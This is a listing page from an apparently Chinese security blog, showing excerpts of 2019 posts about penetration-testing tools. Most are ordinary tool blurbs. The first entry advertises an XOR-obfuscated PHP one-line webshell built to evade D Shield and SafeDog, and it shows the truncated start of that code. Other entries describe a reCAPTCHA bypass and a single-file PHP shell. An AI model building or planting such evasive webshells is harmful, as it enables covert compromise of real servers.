+免杀PHP一句话一枚
免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...
Burpsuite被动扫描流量转发插件:Passive Scan Client
- 2019-08-17
- 安全工具
Passive Scan Client Burpsuite被动扫描流量转发插件 插件简介 将浏览器代理到被动扫描器上,访问网站变慢,甚至有时被封ip,这该怎么办?需要人工渗透的同时后台进行被动扫描,到底是代理到burp还是被...
一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 2019-08-15
- 周边
在很多反向代理场景,或是爬虫中我们都会使用脚本程序提取搜索结果而不是使用谷歌镜像。但谷歌搜索(google)的反爬虫及异常流量标准会给我们带来很多麻烦,一旦出现验证码reCAPTCHA,就基本中断了数据。今天体...
单文件PHP shell脚本:p0wny@shell
p0wny @hell:单文件PHP Shell p0wny @hell 是一个非常基本的单文件PHP shell。当测试PHP应用程序时,它可用于在服务器上快速执行命令。请谨慎使用:此脚本表示服务器存在安全风险,它是类似于webshell的脚本...
RGPerson – 随机身份信息生成脚本
- 2019-08-14
- 安全工具
RGPerson 随机身份信息 做测试的时候经常遇到一些模拟注册的业务场景,要填写的东西很多,一般都是临时去百度信息,这样很繁琐所以决定造轮子撸了个随机身份生成的,如果是非测试场景,可参考社会工程学相关...
38把智能门锁、32把被破解
8月11日,京津冀消费者协会联合发布智能门锁比较试验结果。结果显示智能门锁在IC卡解锁、指纹解锁等方面存在问题较多,但经过“小黑盒事件”后,智能门锁厂家开始重视高强度磁场对智能门锁的冲击。本次比较试验购...
Commando VM v2.0 – 基于Windows的渗透测试工具包
- 2019-08-13
- 安全工具
Commando VM CommandoVM 是一个完全可定制的,基于Windows的安全发行版,用于渗透测试和红队测试。在2019年3月28日发布了首个版本《火眼Windows渗透工具包 – CommandoVM》,现在,2.0版本来了。 Windows渗...
PHP单文件WEB代理脚本:miniProxy
miniProxy web代理 miniProxy是一个用PHP编写的简单Web代理,可以让您绕过Internet内容过滤器(如谷歌镜像),或匿名浏览Internet。miniProxy是根据GNU GPL v3许可的。miniProxy的前身是pageForward。 ...
Rock-ON:一款自动化的多功能网络侦查工具
- 2019-08-12
- 安全工具
Rock-ON网络侦查工具 Rock-On是一款一体化网络侦察工具。它主要用于自动化整个网络侦察过程,找到敏感信息,节省手动完成众多工作所浪费的时间。最近这类全家桶套装渗透测试工具程上升趋势。 Rock-ON网络...
超级关键词URL采集工具:superl-url
- 2019-08-09
- 安全工具
superl-url 关键词URL采集 一款基于Python的开源免费关键词URL采集工具。 根据关键词,对搜索引擎内容检索结果的网址内容进行采集的一款轻量级软程序。程序主要运用于安全渗透测试项目,以及批量评估各类C...
